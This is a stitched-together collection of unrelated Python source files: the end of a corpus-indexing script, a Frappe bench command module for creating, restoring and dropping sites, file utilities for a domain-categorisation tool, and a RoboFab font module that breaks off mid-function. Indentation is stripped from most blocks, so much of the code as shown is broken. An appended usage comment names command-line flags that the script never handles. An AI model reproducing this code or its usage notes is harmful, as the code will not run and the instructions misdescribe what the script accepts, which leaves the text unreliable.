idx.begin_indexing(session)
session.logger.log_debug(session, recStore.id)
session.logger.log_debug(session, idx.id)
# recStore = [recStore.fetch_record(session, '96')]
for i, rec in enumerate(recStore, start=1):
session.logger.log_info(session, str(i))
try:
idx.index_record(session, rec)
except Exception as e:
session.logger.log_error(session, str(e))
traceback.print_exc(file=sys.stdout)
idx.commit_indexing(session)
if ('-loadAll' in sys.argv):
geniaTxr = db.get_object(session, 'corpusTransformer')
indexWF = db.get_object(session, 'indexWorkflow')
data = DATA_DIRECTORY
df.load(session, data)
recStore.begin_storing(session)
db.begin_indexing(session)
for d in df:
doc = ampPreP.process_document(session, d)
try:
rec = xmlp.process_document(session, doc)
print rec
genia = geniaTxr.process_record(session, rec)
rec2 = xmlp.process_document(session, genia)
recStore.create_record(session, rec2)
db.add_record(session, rec2)
indexWF.process(session, rec2)
except Exception as e:
session.logger.log_error(session, str(e))
traceback.print_exc(file=sys.stdout)
recStore.commit_storing(session)
db.commit_indexing(session)
if ('-indexAll' in sys.argv):
indexWF = db.get_object(session, 'indexWorkflow')
db.begin_indexing(session)
for i, rec in enumerate(recStore, start=1):
session.logger.log_info(session, str(i))
try:
indexWF.process(session, rec)
except Exception as e:
session.logger.log_error(session, str(e))
db.commit_indexing(session)
if ('-index' in sys.argv):
indexWF = db.get_object(session, 'indexWorkflow')
db.begin_indexing(session)
for i in range(0, 100):
rec = recStore.fetch_record(session, '%d' % i)
try:
indexWF.process(session, rec)
except Exception as e:
session.logger.log_error(session, str(e))
db.commit_indexing(session)
if ('-stru' in sys.argv):
geniaTxr = db.get_object(session, 'corpusTransformer')
recStore = db.get_object(session, 'struStore')
df = db.get_object(session, 'StruDocumentFactory')
df.load(session)
idx = db.get_object(session, 'stru-idx')
recStore.begin_storing(session)
idx.begin_indexing(session)
for d in df:
doc = ampPreP.process_document(session, d)
try:
rec = xmlp.process_document(session, doc)
session.logger.log_debug(session, rec)
genia = geniaTxr.process_record(session, rec)
rec2 = xmlp.process_document(session, genia)
recStore.create_record(session, rec2)
db.add_record(session, rec2)
idx.index_record(session, rec2)
except Exception as e:
session.logger.log_error(session, str(e))
traceback.print_exc(file=sys.stdout)
recStore.commit_storing(session)
idx.commit_indexing(session)
if ('-cont' in sys.argv):
geniaTxr = db.get_object(session, 'corpusTransformer')
recStore = db.get_object(session, 'contStore')
df = db.get_object(session, 'ContDocumentFactory')
df.load(session)
idx = db.get_object(session, 'cont-idx')
recStore.begin_storing(session)
idx.begin_indexing(session)
for d in df:
doc = ampPreP.process_document(session, d)
try:
rec = xmlp.process_document(session, doc)
session.logger.log_debug(session, rec)
genia = geniaTxr.process_record(session, rec)
rec2 = xmlp.process_document(session, genia)
recStore.create_record(session, rec2)
db.add_record(session, rec2)
idx.index_record(session, rec2)
except Exception as e:
session.logger.log_error(session, str(e))
traceback.print_exc(file=sys.stdout)
recStore.commit_storing(session)
idx.commit_indexing(session)
if ('-adduser' in sys.argv):
un = raw_input('Please enter a username: ')
if not un:
inputError('You must enter a username for this user.')
pw = getpass.getpass('Please enter a password for this user: ')
if not (pw and len(pw)):
inputError('You must enter a password for this user.')
pw2 = getpass.getpass('Please re-enter the password to confirm: ')
if pw != pw2:
inputError('The two passwords submitted did not match. Please try again.')
rn = raw_input('Real name of this user (not mandatory): ')
addy = raw_input('Email address for this user (not mandatory): ')
xml = read_file('xsl/admin.xml').replace('%USERNAME%', un)
adminDict = {'%password%': crypt(pw, pw[:2]),
'%realName%': rn,
'%email%': addy
}
for k,v in adminDict.iteritems():
if v and len(v):
xml = xml.replace(k, '\n <%s>%s</%s>' % (k[1:-1],v,k[1:-1]))
else:
xml = xml.replace(k, '')
doc = StringDocument(xml)
rec = xmlp.process_document(session, doc)
id = rec.process_xpath(session, '/config/@id')[0]
rec.id = id
authStore.store_record(session, rec)
authStore.commit_storing(session)
try:
user = authStore.fetch_object(session, id)
except c3errors.FileDoesNotExistException:
print 'ERROR: User not successfully created. Please try again.'
else:
print 'OK: Username and passwords set for this user'
#print user
sys.exit()
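# --- Usage notes (added; the script filename below is assumed) ---------------
# The sys.argv flags handled above correspond to invocations such as:
#   python index_corpus.py --dickens    # parse, store and index the Dickens novels
#   python index_corpus.py --ntc        # the same for the 19th-century reference corpus
#   python index_corpus.py --addIndex   # (re)build the proximity index over stored records
#   python index_corpus.py -adduser     # interactively create an administrator record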
|
|
from __future__ import unicode_literals, absolute_import, print_function
import click
import hashlib, os, sys, compileall
import frappe
from frappe import _
from frappe.commands import pass_context, get_site
from frappe.commands.scheduler import _is_scheduler_enabled
from frappe.limits import update_limits, get_limits
from frappe.installer import update_site_config
from frappe.utils import touch_file, get_site_path
from six import text_type
# imports - third-party imports
from pymysql.constants import ER
# imports - module imports
from frappe.exceptions import SQLError
@click.command('new-site')
@click.argument('site')
@click.option('--db-name', help='Database name')
@click.option('--mariadb-root-username', default='root', help='Root username for MariaDB')
@click.option('--mariadb-root-password', help='Root password for MariaDB')
@click.option('--admin-password', help='Administrator password for new site', default=None)
@click.option('--verbose', is_flag=True, default=False, help='Verbose')
@click.option('--force', help='Force restore if site/database already exists', is_flag=True, default=False)
@click.option('--source_sql', help='Initiate database with a SQL file')
@click.option('--install-app', multiple=True, help='Install app after installation')
def new_site(site, mariadb_root_username=None, mariadb_root_password=None, admin_password=None, verbose=False, install_apps=None, source_sql=None, force=None, install_app=None, db_name=None):
"Create a new site"
frappe.init(site=site, new_site=True)
_new_site(db_name, site, mariadb_root_username=mariadb_root_username, mariadb_root_password=mariadb_root_password, admin_password=admin_password,
verbose=verbose, install_apps=install_app, source_sql=source_sql, force=force)
if len(frappe.utils.get_sites()) == 1:
use(site)
def _new_site(db_name, site, mariadb_root_username=None, mariadb_root_password=None, admin_password=None,
verbose=False, install_apps=None, source_sql=None,force=False, reinstall=False):
"""Install a new Frappe site"""
if not db_name:
db_name = hashlib.sha1(site.encode()).hexdigest()[:16]
from frappe.installer import install_db, make_site_dirs
from frappe.installer import install_app as _install_app
import frappe.utils.scheduler
frappe.init(site=site)
try:
# enable scheduler post install?
enable_scheduler = _is_scheduler_enabled()
except Exception:
enable_scheduler = False
make_site_dirs()
installing = None
try:
installing = touch_file(get_site_path('locks', 'installing.lock'))
install_db(root_login=mariadb_root_username, root_password=mariadb_root_password, db_name=db_name,
admin_password=admin_password, verbose=verbose, source_sql=source_sql,force=force, reinstall=reinstall)
        apps_to_install = ['frappe'] + (frappe.conf.get("install_apps") or []) + list(install_apps or [])
for app in apps_to_install:
_install_app(app, verbose=verbose, set_as_patched=not source_sql)
frappe.utils.scheduler.toggle_scheduler(enable_scheduler)
frappe.db.commit()
scheduler_status = "disabled" if frappe.utils.scheduler.is_scheduler_disabled() else "enabled"
print("*** Scheduler is", scheduler_status, "***")
except frappe.exceptions.ImproperDBConfigurationError:
_drop_site(site, mariadb_root_username, mariadb_root_password, force=True)
finally:
if installing and os.path.exists(installing):
os.remove(installing)
frappe.destroy()
@click.command('restore')
@click.argument('sql-file-path')
@click.option('--mariadb-root-username', default='root', help='Root username for MariaDB')
@click.option('--mariadb-root-password', help='Root password for MariaDB')
@click.option('--db-name', help='Database name for site in case it is a new one')
@click.option('--admin-password', help='Administrator password for new site')
@click.option('--install-app', multiple=True, help='Install app after installation')
@click.option('--with-public-files', help='Restores the public files of the site, given path to its tar file')
@click.option('--with-private-files', help='Restores the private files of the site, given path to its tar file')
@pass_context
def restore(context, sql_file_path, mariadb_root_username=None, mariadb_root_password=None, db_name=None, verbose=None, install_app=None, admin_password=None, force=None, with_public_files=None, with_private_files=None):
"Restore site database from an sql file"
from frappe.installer import extract_sql_gzip, extract_tar_files
# Extract the gzip file if user has passed *.sql.gz file instead of *.sql file
if not os.path.exists(sql_file_path):
sql_file_path = '../' + sql_file_path
if not os.path.exists(sql_file_path):
            print('Invalid path {0}'.format(sql_file_path[3:]))
sys.exit(1)
if sql_file_path.endswith('sql.gz'):
sql_file_path = extract_sql_gzip(os.path.abspath(sql_file_path))
site = get_site(context)
frappe.init(site=site)
_new_site(frappe.conf.db_name, site, mariadb_root_username=mariadb_root_username,
mariadb_root_password=mariadb_root_password, admin_password=admin_password,
verbose=context.verbose, install_apps=install_app, source_sql=sql_file_path,
force=context.force)
# Extract public and/or private files to the restored site, if user has given the path
if with_public_files:
public = extract_tar_files(site, with_public_files, 'public')
os.remove(public)
if with_private_files:
private = extract_tar_files(site, with_private_files, 'private')
os.remove(private)
@click.command('reinstall')
@click.option('--admin-password', help='Administrator Password for reinstalled site')
@click.option('--yes', is_flag=True, default=False, help='Pass --yes to skip confirmation')
@pass_context
def reinstall(context, admin_password=None, yes=False):
"Reinstall site ie. wipe all data and start over"
site = get_site(context)
_reinstall(site, admin_password, yes, verbose=context.verbose)
def _reinstall(site, admin_password=None, yes=False, verbose=False):
if not yes:
click.confirm('This will wipe your database. Are you sure you want to reinstall?', abort=True)
try:
frappe.init(site=site)
frappe.connect()
frappe.clear_cache()
installed = frappe.get_installed_apps()
frappe.clear_cache()
except Exception:
installed = []
finally:
if frappe.db:
frappe.db.close()
frappe.destroy()
frappe.init(site=site)
_new_site(frappe.conf.db_name, site, verbose=verbose, force=True, reinstall=True,
install_apps=installed, admin_password=admin_password)
@click.command('install-app')
@click.argument('app')
@pass_context
def install_app(context, app):
"Install a new app to site"
from frappe.installer import install_app as _install_app
for site in context.sites:
frappe.init(site=site)
frappe.connect()
try:
_install_app(app, verbose=context.verbose)
finally:
frappe.destroy()
@click.command('list-apps')
@pass_context
def list_apps(context):
"List apps in site"
site = get_site(context)
frappe.init(site=site)
frappe.connect()
print("\n".join(frappe.get_installed_apps()))
frappe.destroy()
@click.command('add-system-manager')
@click.argument('email')
@click.option('--first-name')
@click.option('--last-name')
@click.option('--send-welcome-email', default=False, is_flag=True)
@pass_context
def add_system_manager(context, email, first_name, last_name, send_welcome_email):
"Add a new system manager to a site"
import frappe.utils.user
for site in context.sites:
frappe.connect(site=site)
try:
frappe.utils.user.add_system_manager(email, first_name, last_name, send_welcome_email)
frappe.db.commit()
finally:
frappe.destroy()
@click.command('disable-user')
@click.argument('email')
@pass_context
def disable_user(context, email):
site = get_site(context)
with frappe.init_site(site):
frappe.connect()
user = frappe.get_doc("User", email)
user.enabled = 0
user.save(ignore_permissions=True)
frappe.db.commit()
@click.command('migrate')
@click.option('--rebuild-website', help="Rebuild webpages after migration")
@pass_context
def migrate(context, rebuild_website=False):
"Run patches, sync schema and rebuild files/translations"
from frappe.migrate import migrate
for site in context.sites:
print('Migrating', site)
frappe.init(site=site)
frappe.connect()
try:
migrate(context.verbose, rebuild_website=rebuild_website)
finally:
frappe.destroy()
compileall.compile_dir('../apps', quiet=1)
@click.command('run-patch')
@click.argument('module')
@pass_context
def run_patch(context, module):
"Run a particular patch"
import frappe.modules.patch_handler
for site in context.sites:
frappe.init(site=site)
try:
frappe.connect()
frappe.modules.patch_handler.run_single(module, force=context.force)
finally:
frappe.destroy()
@click.command('reload-doc')
@click.argument('module')
@click.argument('doctype')
@click.argument('docname')
@pass_context
def reload_doc(context, module, doctype, docname):
"Reload schema for a DocType"
for site in context.sites:
try:
frappe.init(site=site)
frappe.connect()
frappe.reload_doc(module, doctype, docname, force=context.force)
frappe.db.commit()
finally:
frappe.destroy()
@click.command('reload-doctype')
@click.argument('doctype')
@pass_context
def reload_doctype(context, doctype):
"Reload schema for a DocType"
for site in context.sites:
try:
frappe.init(site=site)
frappe.connect()
frappe.reload_doctype(doctype, force=context.force)
frappe.db.commit()
finally:
frappe.destroy()
@click.command('use')
@click.argument('site')
def _use(site, sites_path='.'):
"Set a default site"
use(site, sites_path=sites_path)
def use(site, sites_path='.'):
with open(os.path.join(sites_path, "currentsite.txt"), "w") as sitefile:
sitefile.write(site)
@click.command('backup')
@click.option('--with-files', default=False, is_flag=True, help="Take backup with files")
@pass_context
def backup(context, with_files=False, backup_path_db=None, backup_path_files=None,
backup_path_private_files=None, quiet=False):
"Backup"
from frappe.utils.backups import scheduled_backup
verbose = context.verbose
for site in context.sites:
frappe.init(site=site)
frappe.connect()
odb = scheduled_backup(ignore_files=not with_files, backup_path_db=backup_path_db, backup_path_files=backup_path_files, backup_path_private_files=backup_path_private_files, force=True)
if verbose:
from frappe.utils import now
print("database backup taken -", odb.backup_path_db, "- on", now())
if with_files:
print("files backup taken -", odb.backup_path_files, "- on", now())
print("private files backup taken -", odb.backup_path_private_files, "- on", now())
frappe.destroy()
@click.command('remove-from-installed-apps')
@click.argument('app')
@pass_context
def remove_from_installed_apps(context, app):
"Remove app from site's installed-apps list"
from frappe.installer import remove_from_installed_apps
for site in context.sites:
try:
frappe.init(site=site)
frappe.connect()
remove_from_installed_apps(app)
finally:
frappe.destroy()
@click.command('uninstall-app')
@click.argument('app')
@click.option('--yes', '-y', help='To bypass confirmation prompt for uninstalling the app', is_flag=True, default=False, multiple=True)
@click.option('--dry-run', help='List all doctypes that will be deleted', is_flag=True, default=False)
@pass_context
def uninstall(context, app, dry_run=False, yes=False):
"Remove app and linked modules from site"
from frappe.installer import remove_app
for site in context.sites:
try:
frappe.init(site=site)
frappe.connect()
remove_app(app, dry_run, yes)
finally:
frappe.destroy()
@click.command('drop-site')
@click.argument('site')
@click.option('--root-login', default='root')
@click.option('--root-password')
@click.option('--archived-sites-path')
@click.option('--force', help='Force drop-site even if an error is encountered', is_flag=True, default=False)
def drop_site(site, root_login='root', root_password=None, archived_sites_path=None, force=False):
_drop_site(site, root_login, root_password, archived_sites_path, force)
def _drop_site(site, root_login='root', root_password=None, archived_sites_path=None, force=False):
"Remove site from database and filesystem"
from frappe.installer import get_root_connection
from frappe.model.db_schema import DbManager
from frappe.utils.backups import scheduled_backup
frappe.init(site=site)
frappe.connect()
try:
scheduled_backup(ignore_files=False, force=True)
except SQLError as err:
if err[0] == ER.NO_SUCH_TABLE:
if force:
pass
else:
click.echo("="*80)
click.echo("Error: The operation has stopped because backup of {s}'s database failed.".format(s=site))
click.echo("Reason: {reason}{sep}".format(reason=err[1], sep="\n"))
click.echo("Fix the issue and try again.")
click.echo(
"Hint: Use 'bench drop-site {s} --force' to force the removal of {s}".format(sep="\n", tab="\t", s=site)
)
sys.exit(1)
db_name = frappe.local.conf.db_name
frappe.local.db = get_root_connection(root_login, root_password)
dbman = DbManager(frappe.local.db)
dbman.delete_user(db_name)
dbman.drop_database(db_name)
if not archived_sites_path:
archived_sites_path = os.path.join(frappe.get_app_path('frappe'), '..', '..', '..', 'archived_sites')
if not os.path.exists(archived_sites_path):
os.mkdir(archived_sites_path)
move(archived_sites_path, site)
def move(dest_dir, site):
if not os.path.isdir(dest_dir):
raise Exception("destination is not a directory or does not exist")
frappe.init(site)
old_path = frappe.utils.get_site_path()
new_path = os.path.join(dest_dir, site)
# check if site dump of same name already exists
site_dump_exists = True
count = 0
while site_dump_exists:
final_new_path = new_path + (count and str(count) or "")
site_dump_exists = os.path.exists(final_new_path)
count = int(count or 0) + 1
os.rename(old_path, final_new_path)
frappe.destroy()
return final_new_path
@click.command('set-admin-password')
@click.argument('admin-password')
@click.option('--logout-all-sessions', help='Logout from all sessions', is_flag=True, default=False)
@pass_context
def set_admin_password(context, admin_password, logout_all_sessions=False):
"Set Administrator password for a site"
import getpass
from frappe.utils.password import update_password
for site in context.sites:
try:
frappe.init(site=site)
while not admin_password:
admin_password = getpass.getpass("Administrator's password for {0}: ".format(site))
frappe.connect()
update_password(user='Administrator', pwd=admin_password, logout_all_sessions=logout_all_sessions)
frappe.db.commit()
admin_password = None
finally:
frappe.destroy()
@click.command('set-limit')
@click.option('--site', help='site name')
@click.argument('limit')
@click.argument('value')
@pass_context
def set_limit(context, site, limit, value):
"""Sets user / space / email limit for a site"""
_set_limits(context, site, ((limit, value),))
@click.command('set-limits')
@click.option('--site', help='site name')
@click.option('--limit', 'limits', type=(text_type, text_type), multiple=True)
@pass_context
def set_limits(context, site, limits):
_set_limits(context, site, limits)
def _set_limits(context, site, limits):
import datetime
if not limits:
return
if not site:
site = get_site(context)
with frappe.init_site(site):
frappe.connect()
new_limits = {}
for limit, value in limits:
if limit not in ('daily_emails', 'emails', 'space', 'users', 'email_group', 'currency',
'expiry', 'support_email', 'support_chat', 'upgrade_url', 'subscription_id',
'subscription_type', 'current_plan', 'subscription_base_price', 'upgrade_plan',
'upgrade_base_price', 'cancellation_url'):
frappe.throw(_('Invalid limit {0}').format(limit))
if limit=='expiry' and value:
try:
datetime.datetime.strptime(value, '%Y-%m-%d')
except ValueError:
raise ValueError("Incorrect data format, should be YYYY-MM-DD")
elif limit in ('space', 'subscription_base_price', 'upgrade_base_price'):
value = float(value)
elif limit in ('users', 'emails', 'email_group', 'daily_emails'):
value = int(value)
new_limits[limit] = value
update_limits(new_limits)
@click.command('clear-limits')
@click.option('--site', help='site name')
@click.argument('limits', nargs=-1, type=click.Choice(['emails', 'space', 'users', 'email_group',
'expiry', 'support_email', 'support_chat', 'upgrade_url', 'daily_emails', 'cancellation_url']))
@pass_context
def clear_limits(context, site, limits):
"""Clears given limit from the site config, and removes limit from site config if its empty"""
from frappe.limits import clear_limit as _clear_limit
if not limits:
return
if not site:
site = get_site(context)
with frappe.init_site(site):
_clear_limit(limits)
# Remove limits from the site_config, if it's empty
limits = get_limits()
if not limits:
update_site_config('limits', 'None', validate=False)
@click.command('set-last-active-for-user')
@click.option('--user', help="Setup last active date for user")
@pass_context
def set_last_active_for_user(context, user=None):
"Set users last active date to current datetime"
from frappe.core.doctype.user.user import get_system_users
from frappe.utils.user import set_last_active_to_now
site = get_site(context)
with frappe.init_site(site):
frappe.connect()
if not user:
user = get_system_users(limit=1)
if len(user) > 0:
user = user[0]
else:
return
set_last_active_to_now(user)
frappe.db.commit()
@click.command('publish-realtime')
@click.argument('event')
@click.option('--message')
@click.option('--room')
@click.option('--user')
@click.option('--doctype')
@click.option('--docname')
@click.option('--after-commit')
@pass_context
def publish_realtime(context, event, message, room, user, doctype, docname, after_commit):
"Publish realtime event from bench"
from frappe import publish_realtime
for site in context.sites:
try:
frappe.init(site=site)
frappe.connect()
publish_realtime(event, message=message, room=room, user=user, doctype=doctype, docname=docname,
after_commit=after_commit)
frappe.db.commit()
finally:
frappe.destroy()
commands = [
add_system_manager,
backup,
drop_site,
install_app,
list_apps,
migrate,
new_site,
reinstall,
reload_doc,
reload_doctype,
remove_from_installed_apps,
restore,
run_patch,
set_admin_password,
uninstall,
set_limit,
set_limits,
clear_limits,
disable_user,
_use,
set_last_active_for_user,
publish_realtime,
]
|
|
import glob
import os
import sys
import click
from wcategory.conf import DOMAINS_FILE, INPUT_DIR, OUTPUT_DIR, CONF_DIR, CONF_EXTENSION
def write_file(path, string, mode):
file = open(path, mode)
file.write(string)
file.close()
def write_lines(path, lines):
file = open(path, "w")
for line in lines:
file.write(line)
file.close()
def read_file(path):
if os.path.exists(path):
file = open(path, "r")
content = file.read()
file.close()
return content
else:
print_not_found_message(path)
return ""
def read_lines(path):
if os.path.exists(path):
file = open(path, "r")
lines = file.readlines()
file.close()
return lines
else:
print_not_found_message(path)
return []
def remove_line(path, line_to_remove):
lines = read_lines(path)
if lines:
file = open(path, "w")
for line in lines:
line = remove_line_feed(line)
if line != line_to_remove:
file.write(line + "\n")
file.close()
def create_directory(path):
if not os.path.exists(path):
os.makedirs(path)
click.secho("Created directory {}".format(path), fg="green")
def remove_directory(path):
import shutil
if os.path.exists(path):
shutil.rmtree(path)
click.secho("Removed directory {}".format(path), fg="green")
def get_working_directory():
return os.getcwd()
def fix_path(path):
    """
    Removes a slash at the beginning and at the end of the path
    """
    try:
        if path[0] == "/":
            path = path[1:]
        if path[-1] == "/":
            path = path[:-1]
        return path
    except IndexError:
        print_unexpected_path_exit(path)
def get_file_name(file_path):
base_name = os.path.basename(file_path)
return os.path.splitext(base_name)[0]
def find_domain_files(path=None):
if path:
path_pattern = "{}/{}".format(path, DOMAINS_FILE)
else:
path_pattern = "**/{}".format(DOMAINS_FILE)
return glob.glob(path_pattern, recursive=True)
def find_conf_files(exclude=None, service=None):
if service:
path_pattern = "{}/{}{}".format(CONF_DIR, service, CONF_EXTENSION)
else:
path_pattern = "{}/**{}".format(CONF_DIR, CONF_EXTENSION)
conf_files = glob.glob(path_pattern)
if exclude:
return [conf for conf in conf_files if conf not in exclude]
return conf_files
def find_add_remove_conf_files(prefix):
path_pattern = "{}/{}**{}".format(CONF_DIR, prefix, CONF_EXTENSION)
return glob.glob(path_pattern)
def search_text_in_files(text, files):
found = False
counter = 0
for file in files:
lines = read_lines(file)
for index, line in enumerate(lines):
if text.lower() in line.lower():
print_found_message(remove_line_feed(line), index + 1, file)
found = True
counter += 1
print_found_count(text, counter)
if not found:
print_not_found_message(text)
def print_found_message(line_text, line_number, file):
message = "\"{}\" is found at line {} in file \"{}\"".format(line_text, line_number, file)
click.secho(message, fg="green")
def print_not_found_message(line_text):
message = "\"{}\" is not found".format(line_text)
click.secho(message, fg="red")
def print_found_count(text, count):
message = "Searched text \"{}\" found {} times".format(text, count)
click.secho(message, fg="blue")
def print_unique_count(path, count):
message = "Sorted and uniquified {} domains under {}".format(count, path)
click.secho(message, fg="green")
def print_unexpected_path_exit(path):
message = "\"{}\" is not a valid path. Please, remove or edit it".format(path)
click.secho(message, fg="red")
sys.exit()
def create_necessary_files():
necessary_files = [INPUT_DIR, OUTPUT_DIR, CONF_DIR]
for file in necessary_files:
create_directory(file)
def check_environment():
input_dir_exists = os.path.exists(INPUT_DIR)
output_dir_exists = os.path.exists(OUTPUT_DIR)
conf_dir_exists = os.path.exists(CONF_DIR)
if not (input_dir_exists and output_dir_exists and conf_dir_exists):
click.secho("You should first run \"init\" command", fg="red")
sys.exit()
def requires_environment_check(function):
    def check_environment_and_execute(*args, **kwargs):
        check_environment()
        return function(*args, **kwargs)
    return check_environment_and_execute
def exit_if_no(ctx, param, value):
"""
Callback for yes/no option, exits if user's answer is no
"""
if not value:
sys.exit()
def sort_uniquify_lines(path, echo=True):
lines = read_lines(path)
unique_lines = set(lines)
sorted_lines = sorted(unique_lines)
if echo:
count = len(sorted_lines)
print_unique_count(path, count)
write_lines(path, sorted_lines)
return lines
def map_domains_to_path(domain_files, map_path):
"""
Moves domains under domain_files to map_path
"""
content = ""
message = "Mapping to {}".format(map_path)
with click.progressbar(domain_files, label=message) as domain_files:
for file in domain_files:
content += read_file(file)
content = fix_content_to_append(content)
create_directory(map_path)
path_to_write = "{}/{}".format(map_path, DOMAINS_FILE)
write_file(path_to_write, content, "a+")
sort_uniquify_lines(path_to_write)
def remove_line_feed(line):
    if line.endswith("\n"):
        return line[:-1]
    return line
def parse_map(command):
parsed = command.split(" ")
return tuple(parsed[:2]), [exclude[1:] for exclude in parsed[2:]]
def parse_add_remove(command):
return command.split(" ")[1:3]
def check_prefix(prefix, line):
try:
return line[0] == prefix
except IndexError:
return False
def invoke_map_commands(command_function, file, prefix):
"""
Invokes cli's map command for conf files
"""
service = get_file_name(file)
lines = read_lines(file)
for line in lines:
if check_prefix(prefix, line):
line = remove_line_feed(line)
args = parse_map(line)
category_paths, exclude_path = args[0], args[1]
command_function(service, *category_paths, exclude_path)
def invoke_add_remove_commands(command_function, file, prefix):
"""
Invokes cli's add/remove command for conf files
"""
lines = read_lines(file)
for line in lines:
if check_prefix(prefix, line):
line = remove_line_feed(line)
args = parse_add_remove(line)
command_function(*args)
def fix_content_to_append(content):
"""
Needed when appending files
If there is no line feed at the end of content, adds line feed at the end
"""
if content:
if content[-1] != "\n":
content += "\n"
return content
def fix_file_to_append(path, content_to_add):
"""
Needed when appending files
If there is no line feed at end of file, adds line feed at the beginning of content
"""
content_to_check = read_file(path)
if content_to_check:
if content_to_check[-1] != "\n":
content_to_add = "\n" + content_to_add
return content_to_add
def save_map_command_to_conf(service, category_path, map_category_path, exclude_path):
line_wo_exclude = "/{} /{}\n".format(fix_path(category_path), fix_path(map_category_path))
line_to_save = save_map_exclude_to_conf(line_wo_exclude, exclude_path)
conf_file_path = "{}/{}{}".format(CONF_DIR, service, CONF_EXTENSION)
line_to_save = fix_file_to_append(conf_file_path, line_to_save)
write_file(conf_file_path, line_to_save, "a+")
def save_add_remove_command_to_conf(domain, category_path, prefix, file_prefix):
line_to_save = "{} {} /{}\n".format(prefix, domain, fix_path(category_path))
conf_file_path = "{}/{}{}".format(CONF_DIR, file_prefix, CONF_EXTENSION)
line_to_save = fix_file_to_append(conf_file_path, line_to_save)
write_file(conf_file_path, line_to_save, "a+")
def save_map_exclude_to_conf(line_to_save, exclude_path):
if exclude_path:
line_to_save = line_to_save[:-1]
for path in exclude_path:
line_to_save += " -/{}".format(fix_path(path))
line_to_save += "\n"
return line_to_save
def exclude_domain(domain_files, directory_path, exclude_path):
excluded_domain_files = []
if exclude_path:
for path in exclude_path:
if directory_path[-1] == "*" and directory_path[-2] == "*":
directory_path = directory_path[:-3]
exclude_directory_path = "{}/{}".format(directory_path, fix_path(path))
excluded_domain_files.extend(find_domain_files(exclude_directory_path))
return [domain_file for domain_file in domain_files if domain_file not in excluded_domain_files]
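# --- Self-check sketch (added; example values only) --------------------------
# A quick illustration of the pure path/command helpers defined above.
if __name__ == "__main__":
    assert fix_path("/news/local/") == "news/local"
    assert fix_content_to_append("example.com") == "example.com\n"
    categories, excludes = parse_map("/old/category /new/category -/excluded/sub")
    assert categories == ("/old/category", "/new/category")
    assert excludes == ["/excluded/sub"]
    assert check_prefix("+", "+ example.com /news/local")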
|
|
"""UFO for GlifLib"""
from robofab import RoboFabError, RoboFabWarning
from robofab.objects.objectsBase import BaseFont, BaseKerning, BaseGroups, BaseInfo, BaseFeatures, BaseLib,\
BaseGlyph, BaseContour, BaseSegment, BasePoint, BaseBPoint, BaseAnchor, BaseGuide, BaseComponent, \
relativeBCPIn, relativeBCPOut, absoluteBCPIn, absoluteBCPOut, _box,\
_interpolate, _interpolatePt, roundPt, addPt,\
MOVE, LINE, CORNER, CURVE, QCURVE, OFFCURVE,\
BasePostScriptFontHintValues, postScriptHintDataLibKey, BasePostScriptGlyphHintValues
import os
__all__ = [ "CurrentFont",
"CurrentGlyph", 'OpenFont',
'RFont', 'RGlyph', 'RContour',
'RPoint', 'RBPoint', 'RAnchor',
'RComponent'
]
def CurrentFont():
return None
def CurrentGlyph():
return None
def OpenFont(path=None, note=None):
"""Open a font from a path. If path is not given, present the user with a dialog."""
if not note:
note = 'select a .ufo directory'
if not path:
from robofab.interface.all.dialogs import GetFolder
path = GetFolder(note)
if path:
try:
return RFont(path)
except OSError:
from robofab.interface.all.dialogs import Message
Message("%s is not a valid .UFO font. But considering it's all XML, why don't you have a look inside with a simple text editor."%(path))
else:
return None
def NewFont(familyName=None, styleName=None):
"""Make a new font"""
new = RFont()
if familyName is not None:
new.info.familyName = familyName
if styleName is not None:
new.info.styleName = styleName
return new
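# Example (a sketch): NewFont("MyFamily", "Regular") returns an empty RFont with
# the family and style names filled in; OpenFont("/path/to/Font.ufo") reads an
# existing UFO from disk, falling back to a folder-picker dialog when no path
# is given.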
def AllFonts():
"""AllFonts can't work in plain python usage. It's really up to some sort of application
to keep track of which fonts are open."""
raise NotImplementedError
class PostScriptFontHintValues(BasePostScriptFontHintValues):
""" Font level PostScript hints object for objectsRF usage.
If there are values in the lib, use those.
If there are no values in the lib, use defaults.
The psHints attribute for objectsRF.RFont is basically just the
data read from the Lib. When the object saves to UFO, the
hints are written back to the lib, which is then saved.
"""
def __init__(self, aFont=None, data=None):
self.setParent(aFont)
BasePostScriptFontHintValues.__init__(self)
if aFont is not None:
# in version 1, this data was stored in the lib
# if it is still there, guess that it is correct
# move it to font info and remove it from the lib.
libData = aFont.lib.get(postScriptHintDataLibKey)
if libData is not None:
self.fromDict(libData)
                del aFont.lib[postScriptHintDataLibKey]
if data is not None:
self.fromDict(data)
def getPostScriptHintDataFromLib(aFont, fontLib):
hintData = fontLib.get(postScriptHintDataLibKey)
psh = PostScriptFontHintValues(aFont)
psh.fromDict(hintData)
return psh
class PostScriptGlyphHintValues(BasePostScriptGlyphHintValues):
""" Glyph level PostScript hints object for objectsRF usage.
If there are values in the lib, use those.
If there are no values in the lib, be empty.
"""
def __init__(self, aGlyph=None, data=None):
# read the data from the glyph.lib, it won't be anywhere else
BasePostScriptGlyphHintValues.__init__(self)
if aGlyph is not None:
self.setParent(aGlyph)
self._loadFromLib(aGlyph.lib)
if data is not None:
self.fromDict(data)
class RFont(BaseFont):
"""UFO font object which reads and writes glif, and keeps the data in memory in between.
    Behaviour:
- comparable to Font
- comparable to GlyphSet so that it can be passed to Glif widgets
"""
_title = "RoboFabFont"
def __init__(self, path=None):
BaseFont.__init__(self)
if path is not None:
self._path = os.path.normpath(os.path.abspath(path))
else:
self._path = None
self._object = {}
self._glyphSet = None
self._scheduledForDeletion = [] # this is a place for storing glyphs that need to be removed when the font is saved
self.kerning = RKerning()
self.kerning.setParent(self)
self.info = RInfo()
self.info.setParent(self)
self.features = RFeatures()
self.features.setParent(self)
self.groups = RGroups()
self.groups.setParent(self)
self.lib = RLib()
self.lib.setParent(self)
if path:
self._loadData(path)
else:
self.psHints = PostScriptFontHintValues(self)
self.psHints.setParent(self)
def __setitem__(self, glyphName, glyph):
"""Set a glyph at key."""
self._object[glyphName] = glyph
def __cmp__(self, other):
"""Compare this font with another, compare if they refer to the same file."""
if not hasattr(other, '_path'):
return -1
		if self._path == other._path and self._path is not None:
return 0
else:
return -1
def __len__(self):
if self._glyphSet is None:
return 0
return len(self._glyphSet)
def _loadData(self, path):
from robofab.ufoLib import UFOReader
reader = UFOReader(path)
fontLib = reader.readLib()
# info
reader.readInfo(self.info)
# kerning
self.kerning.update(reader.readKerning())
self.kerning.setChanged(False)
# groups
self.groups.update(reader.readGroups())
# features
if reader.formatVersion == 1:
# migrate features from the lib
features = []
